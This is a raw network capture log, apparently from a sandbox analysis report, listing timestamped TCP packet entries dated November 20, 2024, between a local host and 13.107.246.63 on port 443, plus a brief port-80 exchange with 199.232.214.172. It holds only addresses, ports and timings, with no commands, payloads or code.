                                                                                                                                                                                            Nov 20, 2024 21:05:03.220810890 CET49820443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:03.220844984 CET4434982013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:03.221254110 CET49820443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:03.221261024 CET4434982013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:03.521037102 CET4434981713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:03.521106005 CET4434981713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:03.521168947 CET49817443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:03.521387100 CET49817443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:03.521415949 CET4434981713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:03.521436930 CET49817443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:03.521445990 CET4434981713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:03.524091005 CET49821443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:03.524132013 CET4434982113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:03.524210930 CET49821443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:03.524344921 CET49821443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:03.524360895 CET4434982113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:03.635700941 CET4434981613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:03.635757923 CET4434981613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:03.635869026 CET49816443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:03.638370037 CET4434981813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:03.638452053 CET4434981813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:03.638501883 CET49818443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:03.664592981 CET49816443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:03.664592981 CET49816443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:03.664628029 CET4434981613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:03.664640903 CET4434981613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:03.665707111 CET49818443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:03.665707111 CET49818443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:03.665720940 CET4434981813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:03.665730953 CET4434981813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:03.672215939 CET4434981513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:03.672297001 CET4434981513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:03.672383070 CET49815443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:03.730150938 CET4434982013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:03.730221987 CET4434982013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:03.730274916 CET49820443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:03.733469009 CET49815443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:03.733489037 CET4434981513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:03.733503103 CET49815443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:03.733510971 CET4434981513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:03.743768930 CET49820443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:03.743792057 CET4434982013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:03.743804932 CET49820443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:03.743810892 CET4434982013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:03.796495914 CET49822443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:03.796541929 CET4434982213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:03.796643972 CET49822443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:03.803483009 CET49822443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:03.803513050 CET4434982213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:03.813249111 CET49823443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:03.813292027 CET4434982313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:03.813364983 CET49823443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:03.813503027 CET49823443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:03.813519955 CET4434982313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:03.814610004 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:03.814656019 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:03.814724922 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:03.817606926 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:03.817617893 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:03.821907043 CET49825443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:03.821949959 CET4434982513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:03.822031021 CET49825443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:03.822139025 CET49825443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:03.822158098 CET4434982513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:05.397058010 CET4434982113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:05.400638103 CET49821443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:05.400652885 CET4434982113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:05.401129961 CET49821443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:05.401137114 CET4434982113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:05.617355108 CET4434982213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:05.618016958 CET49822443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:05.618042946 CET4434982213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:05.618547916 CET49822443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:05.618560076 CET4434982213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:05.633177042 CET4434982513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:05.633599997 CET49825443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:05.633649111 CET4434982513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:05.634114981 CET49825443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:05.634120941 CET4434982513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:05.649209976 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:05.649581909 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:05.649595022 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:05.650039911 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:05.650044918 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:05.688787937 CET4434982313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:05.689441919 CET49823443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:05.689459085 CET4434982313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:05.690085888 CET49823443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:05.690093040 CET4434982313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:05.859205961 CET4434982113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:05.859302998 CET4434982113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:05.859401941 CET49821443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:05.859666109 CET49821443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:05.859666109 CET49821443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:05.859687090 CET4434982113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:05.859699011 CET4434982113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:05.862823963 CET49826443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:05.862868071 CET4434982613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:05.862952948 CET49826443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:05.863137960 CET49826443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:05.863146067 CET4434982613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:06.088140011 CET4434982213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:06.088304043 CET4434982213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:06.088402033 CET49822443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:06.088488102 CET49822443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:06.088506937 CET4434982213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:06.088536978 CET49822443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:06.088545084 CET4434982213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:06.091145992 CET49827443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:06.091188908 CET4434982713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:06.091268063 CET49827443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:06.091438055 CET49827443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:06.091456890 CET4434982713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:06.132359982 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:06.132412910 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:06.132541895 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:06.132730007 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:06.132730007 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:06.132740974 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:06.132747889 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:06.135766029 CET49828443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:06.135818005 CET4434982813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:06.135926962 CET49828443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:06.137682915 CET49828443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:06.137701035 CET4434982813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:06.175733089 CET4434982313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:06.175817013 CET4434982313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:06.175880909 CET49823443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:06.176516056 CET4434982513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:06.176593065 CET4434982513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:06.176640034 CET49825443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:06.191165924 CET49823443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:06.191201925 CET4434982313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:06.191236973 CET49823443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:06.191246033 CET4434982313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:06.192478895 CET49825443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:06.192500114 CET4434982513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:06.192513943 CET49825443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:06.192521095 CET4434982513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:06.225871086 CET49829443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:06.225946903 CET4434982913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:06.226059914 CET49829443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:06.226263046 CET49829443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:06.226298094 CET4434982913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:06.226819992 CET49830443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:06.226888895 CET4434983013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:06.226973057 CET49830443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:06.227189064 CET49830443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:06.227217913 CET4434983013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:07.596688986 CET4972480192.168.2.4199.232.214.172
                                                                                                                                                                                            Nov 20, 2024 21:05:07.642220020 CET4434982613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:07.645459890 CET49826443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:07.645492077 CET4434982613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:07.646044016 CET49826443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:07.646049976 CET4434982613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:07.724167109 CET8049724199.232.214.172192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:07.725672960 CET4972480192.168.2.4199.232.214.172
                                                                                                                                                                                            Nov 20, 2024 21:05:07.972153902 CET4434982813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:07.972716093 CET49828443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:07.972784042 CET4434982813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:07.973203897 CET49828443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:07.973217964 CET4434982813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:07.975927114 CET4434983013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:07.976382971 CET49830443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:07.976402044 CET4434983013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:07.976721048 CET49830443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:07.976732969 CET4434983013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:07.980664015 CET4434982713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:07.981158972 CET49827443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:07.981192112 CET4434982713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:07.981599092 CET49827443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:07.981609106 CET4434982713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:08.055432081 CET4434982913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:08.055916071 CET49829443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:08.055948019 CET4434982913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:08.056401968 CET49829443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:08.056408882 CET4434982913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:08.079253912 CET4434982613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:08.079442978 CET4434982613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:08.079523087 CET49826443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:08.079602003 CET49826443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:08.079622030 CET4434982613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:08.079634905 CET49826443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:08.079641104 CET4434982613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:08.082891941 CET49831443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:08.082956076 CET4434983113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:08.083043098 CET49831443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:08.083174944 CET49831443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:08.083190918 CET4434983113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:08.419914961 CET4434983013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:08.419970036 CET4434983013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:08.420048952 CET49830443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:08.420193911 CET49830443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:08.420193911 CET49830443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:08.420248032 CET4434983013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:08.420278072 CET4434983013.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:08.420826912 CET4434982813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:08.420893908 CET4434982813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:08.420947075 CET49828443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:08.421147108 CET49828443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:08.421169043 CET4434982813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:08.421194077 CET49828443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:08.421210051 CET4434982813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:08.423763990 CET49832443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:08.423814058 CET4434983213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:08.423883915 CET49832443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:08.424036026 CET49832443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:08.424050093 CET4434983213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:08.424685955 CET49833443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:08.424729109 CET4434983313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:08.424792051 CET49833443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:08.424901962 CET49833443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:08.424921989 CET4434983313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:08.425643921 CET4434982713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:08.425857067 CET4434982713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:08.425915003 CET49827443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:08.426033974 CET49827443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:08.426060915 CET4434982713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:08.426079035 CET49827443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:08.426084995 CET4434982713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:08.428200006 CET49834443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:08.428227901 CET4434983413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:08.428319931 CET49834443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:08.428414106 CET49834443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:08.428420067 CET4434983413.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:08.506381035 CET4434982913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:08.506458044 CET4434982913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:08.506546974 CET49829443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:08.506779909 CET49829443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:08.506835938 CET4434982913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:08.506872892 CET49829443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:08.506891012 CET4434982913.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:08.510092974 CET49835443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:08.510112047 CET4434983513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:08.510198116 CET49835443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:08.510315895 CET49835443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:08.510324001 CET4434983513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:09.823983908 CET4434983113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:09.824486017 CET49831443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:09.824527979 CET4434983113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:09.825270891 CET49831443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:09.825284958 CET4434983113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:10.161115885 CET4434983213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:10.161767006 CET49832443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:10.161792040 CET4434983213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:10.162455082 CET49832443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:10.162461996 CET4434983213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:10.172800064 CET4434983313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:10.173294067 CET49833443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:10.173333883 CET4434983313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:10.173738003 CET49833443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:10.173746109 CET4434983313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:10.266851902 CET4434983113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:10.266932011 CET4434983113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:10.267266035 CET49831443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:10.267393112 CET49831443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:10.267393112 CET49831443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:10.267440081 CET4434983113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:10.267472982 CET4434983113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:10.268681049 CET4434983513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:10.269989967 CET49835443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:10.270031929 CET4434983513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:10.270414114 CET49835443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:10.270421028 CET4434983513.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:10.270757914 CET49836443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:10.270816088 CET4434983613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:10.271006107 CET49836443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:10.271086931 CET49836443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:10.271095991 CET4434983613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:10.603890896 CET4434983213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:10.603981972 CET4434983213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:10.604106903 CET49832443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:10.604387999 CET49832443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:10.604387999 CET49832443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:10.604418993 CET4434983213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:10.604433060 CET4434983213.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:10.608015060 CET49837443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:10.608050108 CET4434983713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:10.608148098 CET49837443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:10.608383894 CET49837443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:10.608400106 CET4434983713.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:10.636295080 CET4434983313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:10.636348963 CET4434983313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:10.636584044 CET49833443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:10.636647940 CET49833443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:10.636667967 CET4434983313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:10.636682987 CET49833443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:10.636689901 CET4434983313.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:10.639822960 CET49838443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:05:10.639885902 CET4434983813.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:05:10.639978886 CET49838443192.168.2.413.107.246.63
